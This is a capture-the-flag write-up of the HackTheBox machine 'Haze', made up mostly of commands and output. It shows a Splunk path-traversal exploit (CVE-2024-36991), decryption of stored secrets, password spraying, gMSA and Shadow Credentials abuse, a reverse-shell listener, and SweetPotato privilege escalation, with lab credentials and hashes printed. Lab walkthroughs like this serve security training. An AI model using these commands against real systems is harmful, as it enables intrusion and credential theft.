walidpyh

Haze - HTB

Sat, 29 Mar 2025 00:00:00 GMT

Haze (10.10.11.61)

Enumeration & Data Gathering

rustscan -a 10.10.11.61 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.61:53
Open 10.10.11.61:88
Open 10.10.11.61:135
Open 10.10.11.61:139
Open 10.10.11.61:389
Open 10.10.11.61:445
Open 10.10.11.61:593
Open 10.10.11.61:636
Open 10.10.11.61:464
Open 10.10.11.61:3268
Open 10.10.11.61:3269
Open 10.10.11.61:5985
Open 10.10.11.61:8000
Open 10.10.11.61:8089
Open 10.10.11.61:8088
Open 10.10.11.61:9389
Open 10.10.11.61:47001
Open 10.10.11.61:49665
Open 10.10.11.61:49664
Open 10.10.11.61:49667
Open 10.10.11.61:49669
Open 10.10.11.61:49666
Open 10.10.11.61:50678
Open 10.10.11.61:58764
Open 10.10.11.61:58763
Open 10.10.11.61:58781
Open 10.10.11.61:58762
Open 10.10.11.61:58795
Open 10.10.11.61:58813
Open 10.10.11.61:58962
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.61
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 10:56 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:56
Completed NSE at 10:56, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:56
Completed NSE at 10:56, 0.00s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning haze.htb (10.10.11.61) [30 ports]
Discovered open port 53/tcp on 10.10.11.61
Discovered open port 139/tcp on 10.10.11.61
Discovered open port 445/tcp on 10.10.11.61
Discovered open port 636/tcp on 10.10.11.61
Discovered open port 58764/tcp on 10.10.11.61
Discovered open port 593/tcp on 10.10.11.61
Discovered open port 49664/tcp on 10.10.11.61
Discovered open port 135/tcp on 10.10.11.61
Discovered open port 5985/tcp on 10.10.11.61
Discovered open port 47001/tcp on 10.10.11.61
Discovered open port 58762/tcp on 10.10.11.61
Discovered open port 3268/tcp on 10.10.11.61
Discovered open port 49667/tcp on 10.10.11.61
Discovered open port 49665/tcp on 10.10.11.61
Discovered open port 3269/tcp on 10.10.11.61
Discovered open port 8088/tcp on 10.10.11.61
Discovered open port 58781/tcp on 10.10.11.61
Discovered open port 389/tcp on 10.10.11.61
Discovered open port 58763/tcp on 10.10.11.61
Discovered open port 8000/tcp on 10.10.11.61
Discovered open port 8089/tcp on 10.10.11.61
Discovered open port 49666/tcp on 10.10.11.61
Discovered open port 9389/tcp on 10.10.11.61
Discovered open port 464/tcp on 10.10.11.61
Discovered open port 58813/tcp on 10.10.11.61
Discovered open port 49669/tcp on 10.10.11.61
Discovered open port 50678/tcp on 10.10.11.61
Discovered open port 58795/tcp on 10.10.11.61
Discovered open port 88/tcp on 10.10.11.61
Discovered open port 58962/tcp on 10.10.11.61
Completed SYN Stealth Scan at 10:56, 0.16s elapsed (30 total ports)
NSE: Script scanning 10.10.11.61.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:56
NSE Timing: About 94.44% done; ETC: 10:56 (0:00:02 remaining)
NSE Timing: About 94.81% done; ETC: 10:57 (0:00:03 remaining)
NSE Timing: About 95.76% done; ETC: 10:57 (0:00:04 remaining)
NSE Timing: About 95.90% done; ETC: 10:58 (0:00:05 remaining)
NSE Timing: About 97.42% done; ETC: 10:58 (0:00:04 remaining)
NSE Timing: About 97.76% done; ETC: 10:59 (0:00:04 remaining)
Completed NSE at 10:59, 210.06s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:59
Completed NSE at 10:59, 0.00s elapsed
Nmap scan report for haze.htb (10.10.11.61)
Host is up, received user-set (0.056s latency).
Scanned at 2025-04-05 10:56:03 +00 for 210s

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-30 08:36:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after:  2026-03-05T07:12:20
| MD5:   db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after:  2026-03-05T07:12:20
| MD5:   db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after:  2026-03-05T07:12:20
| MD5:   db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Issuer: commonName=haze-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:12:20
| Not valid after:  2026-03-05T07:12:20
| MD5:   db18:a1f5:986c:1470:b848:35ec:d437:1ca0
|_SHA-1: 6cdd:5696:f250:6feb:1a27:abdf:d470:5143:3ab8:5d1f
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          Splunkd httpd
|_http-favicon: Unknown favicon MD5: E60C968E8FF3CC2F4FB869588E83AFC6
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
8088/tcp  open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after:  2028-03-04T07:29:08
| MD5:   82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-robots.txt: 1 disallowed entry
|_/
| http-methods:
|_  Supported Methods: GET POST HEAD OPTIONS
8089/tcp  open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-05T07:29:08
| Not valid after:  2028-03-04T07:29:08
| MD5:   82e5:ba5a:c723:2f49:6f67:395b:5e64:ed9b
|_SHA-1: e859:76a6:03da:feef:c1ab:9acf:ecc7:fd75:f1e5:1ab2
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
51834/tcp open  msrpc         Microsoft Windows RPC
56882/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
56883/tcp open  msrpc         Microsoft Windows RPC
56884/tcp open  msrpc         Microsoft Windows RPC
56901/tcp open  msrpc         Microsoft Windows RPC
56915/tcp open  msrpc         Microsoft Windows RPC
56933/tcp open  msrpc         Microsoft Windows RPC
57068/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Initial enumeration revealed two domains:

dc01.haze.htb
haze.htb

Additionally, an interesting Splunk instance was discovered running on port 8000, as seen below:

This particular Splunk version was vulnerable to CVE-2024-36991, which allows for LFI (Local File Inclusion) and arbitrary file reads on the underlying OS.

Exploitation

To exploit this, I used this PoC which automates the LFI attack and attempts to read /etc/passwd:

python3 CVE-2024-36991.py -u http://10.10.11.61:8000

  ______     _______     ____   ___ ____  _  _        _____  __   ___   ___  _
 / ___\ \   / | ____|   |___ \ / _ |___ \| || |      |___ / / /_ / _ \ / _ \/ |
| |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|________) | (_) \__, |\__, | |
 \____|  \_/  |_____|   |_____|\___|_____|  |_|      |____/ \___/  /_/   /_/|_|

-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.

[INFO] Log directory created: logs
[INFO] Testing single target: http://10.10.11.61:8000
[VLUN] Vulnerable: http://10.10.11.61:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

I tried cracking the hashes using John with the classic rockyou.txt, but no luck. So I pivoted—what else could I read through the LFI?

After some Splunk digging, I found that it’s credentials are typically stored in:

The user runs the app in Splunk Web for the first time and lands on the app’s setup page.
The user enters the username, password, and realm for their secret.
The setup page code submits a POST request to the storage/passwords REST API endpoint.
The storage/passwords endpoint encrypts the user’s password and stores the secret in the $SPLUNK_HOME/etc/apps/appname/local/passwords.conf file.

Secrets stored in the passwords.conf file follow this format:

[credential:<realm>:<username>:]
password = <password>

Also useful: authentication.conf contains LDAP configurations and bind credentials.

https://docs.splunk.com/Documentation/Splunk/latest/Admin/Authenticationconf

But to decrypt passwords, we need the Splunk encryption key stored in the splunk.secret file.

splunk.secret

curl -s "http:/haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

authentication.conf

curl -s "http:/haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf"
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

And there! I got Paul Taylor encrypted Password, for decrypting it I used splunksecrets

pipx install splunksecrets
  installed package splunksecrets 1.0.0, installed using Python 3.13.2
  These apps are now globally available
    - splunksecrets
done! ✨ 🌟 ✨

splunksecrets splunk-decrypt -S splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

xx Ld@p_Auth_Sp1unk@2k24

And it works on netexec

Gaining Initial Access

Armed with valid credentials:

Username: paul.taylor  
Password: Ld@p_Auth_Sp1unk@2k24

I used CrackMapExec to test access:

netexec ldap $IP -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

It works! so next I dumped all RID-based user/group info from the domain controller

netexec smb $IP -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.10.11.61     445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.10.11.61     445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.10.11.61     445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.10.11.61     445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.10.11.61     445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.61     445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.10.11.61     445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.10.11.61     445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.10.11.61     445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.10.11.61     445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1112: HAZE\Support_Services (SidTypeGroup)

Since the Splunk password worked for Paul, I wondered if it was reused elsewhere?

I tried spraying it across other known usernames:

netexec smb $IP -u names.txt -p Ld@p_Auth_Sp1unk@2k24  --continue-on-success
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB         10.10.11.61     445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.10.11.61     445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB         10.10.11.61     445    DC01             [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE

Mark Adams was also using the same password! Perfect now time to bloodhound this!

netexec ldap $IP -u mark.adams -p Ld@p_Auth_Sp1unk@2k24  --bloodhound --collection All --dns-server $IP
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAP        10.10.11.61     389    DC01             Resolved collection methods: trusts, container, session, localadmin, acl, rdp, group, psremote, objectprops, dcom
LDAP        10.10.11.61     389    DC01             Done in 00M 19S
LDAP        10.10.11.61     389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.61_2025-04-01_024923_bloodhound.zip

Earlier, I saw that mark.adams is a member of the GMSA_MANAGERS group:

With that in mind, I attempted to query GMSA:

netexec ldap $IP -u mark.adams -p Ld@p_Auth_Sp1unk@2k24  --gmsa
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM:

The command successfully authenticated and even revealed the account Haze-IT-Backup$ — though no NTLM hash was returned... yet.

To resolve this, I logged in and explicitly gave myself permission to retrieve the GMSA password:

evil-winrm -i $IP -u mark.adams -p Ld@p_Auth_Sp1unk@2k24

*Evil-WinRM* PS C:\Users\mark.adams\Downloads> Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

After that, running the same command again gave us what I needed:

netexec ldap $IP -u mark.adams -p Ld@p_Auth_Sp1unk@2k24  --gmsa
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: 735c02c6b2dc54c3c8c6891f55279ebc

BloodHound showed that Haze-IT-Backup$ has WriteOwner permissions on the SUPPORT_SERVICES group:

Following the attack path, we saw that by adding Haze-IT-Backup$ to SUPPORT_SERVICES, we could eventually compromise edward.martin.

To carry out the attack, I followed the Shadow Credentials technique. First, sync time for krb operations. Then:

bloodyAD --host $IP -d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

bloodyAD --host $IP -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"

[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES

bloodyAD --host $IP -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to SUPPORT_SERVICES

With privileges in place, I used pywhisker to implant credentials via Shadow Credentials:

pywhisker -d haze.htb -u Haze-IT-Backup$ -H 735c02c6b2dc54c3c8c6891f55279ebc --target edward.martin --action "list"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read
permissions on that attribute

pywhisker -d haze.htb -u Haze-IT-Backup$ -H 735c02c6b2dc54c3c8c6891f55279ebc --target edward.martin --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 351f354f-9da4-58c9-7a05-74971bac4061
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: ewFuHEZF.pfx
[*] Must be used with password: p2MbDrBLa3YjBwm5uSpM
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

pywhisker -d haze.htb -u Haze-IT-Backup$ -H 735c02c6b2dc54c3c8c6891f55279ebc --target edward.martin --action "list"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Listing devices for edward.martin
[*] DeviceID: 351f354f-9da4-58c9-7a05-74971bac4061 | Creation Time (UTC): 2025-04-01
11:50:26.416698

Now I had enough to request a TGT and abuse the implanted shadow credential:

impacket-getTGT haze.htb/'Haze-IT-Backup$' -hashes :735c02c6b2dc54c3c8c6891f55279ebc -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Haze-IT-Backup$.ccache

export KRB5CCNAME=Haze-IT-Backup\$.ccache

After executing the attack, I successfully retrieved the NT hash of edward.martin:

certipy shadow auto -u 'Haze-IT-Backup$'@haze.htb -hashes :735c02c6b2dc54c3c8c6891f55279ebc -account edward.martin -target dc01.haze.htb -dc-ip $IP -k
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '15e0634f-88ba-31a9-018f-636518c5167b'
[*] Adding Key Credential with device ID '15e0634f-88ba-31a9-018f-636518c5167b' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '15e0634f-88ba-31a9-018f-636518c5167b' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Now we can get the user flag after logging with this NT Hash!

evil-winrm -i $IP -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Evil-WinRM shell v3.7
...
*Evil-WinRM* PS C:\Users\edward.martin> tree . /F
Folder PATH listing
Volume serial number is 3985-943C
C:\USERS\EDWARD.MARTIN
+---Desktop
¦       user.txt
¦
+---Documents
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Videos

Privilege Escalation

After gaining access, I noticed something interesting, a Backups ****directory is now accessible.

A large zip was found inside of it:

*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> cd Splunk
*Evil-WinRM* PS C:\Backups\Splunk> dir

Directory: C:\Backups\Splunk

Mode              LastWriteTime        Length      Name
----              -------------        ------      ----
-a----            8/6/2024  3:22 PM    27445566    splunk_backup_2024-08-06.zip

I copied that to my machine to take a closer look using copy splunk_backup_2024-08-06.zip

Once unzipped, I began searching for Splunk secrets. A common pattern for encrypted strings in Splunk is $1$ and $7$ . So I grepped for them:

grep '$7$' -i ./* -F -r
./var/run/splunk/confsnapshot/baseline_local/system/local/server.conf:
    pass4SymmKey = $7$u538ChVu1V7V9pXEWterpsj8mxzvVORn8UdnesMP0CHaarB03fSbow==
    sslPassword = $7$C4l4wOYleflCKJRL9l/lBJJQEBeO16syuwmsDCwft11h7QPjPH8Bog==
    
grep '$1$' -i ./* -F -r
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf:
    bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=

And there we had a brand new password! $1$YDz8WfhoCWmf6aTRkA+QqUI=

Very same method used earlier to decrypt this one as well

splunksecrets splunk-decrypt -S etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=

Sp1unkadmin@2k24

Now that I had a juicy password for Splunk's admin interface, I went right away to test it on the dashboard and it worked of course 😎

Now that we have the administrator Access we can spawn a reverse shell an a splunk app by utilizing this POC tool

Then simply uploading it to the splunk instances gives us access back

rlwrap nc -nlvp 1337

Connection received on 10.10.11.61 1337
whoami
haze\alexander.green

We’re in, but not quite as system. alexander.green

SweetPotato did the trick to escalate the privileges, uploaded and executed it to get the root flag.

./SweetPotato.exe -a 'type C:\Users\Administrator\Desktop\root.txt'

Modifying SweetPotato by Uknow to support webshell
Github: https://github.com/uknowsec/SweetPotato
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
[+] Attempting NP impersonation using method PrintSpoofer to launch c:\Windows\System32\cmd.exe
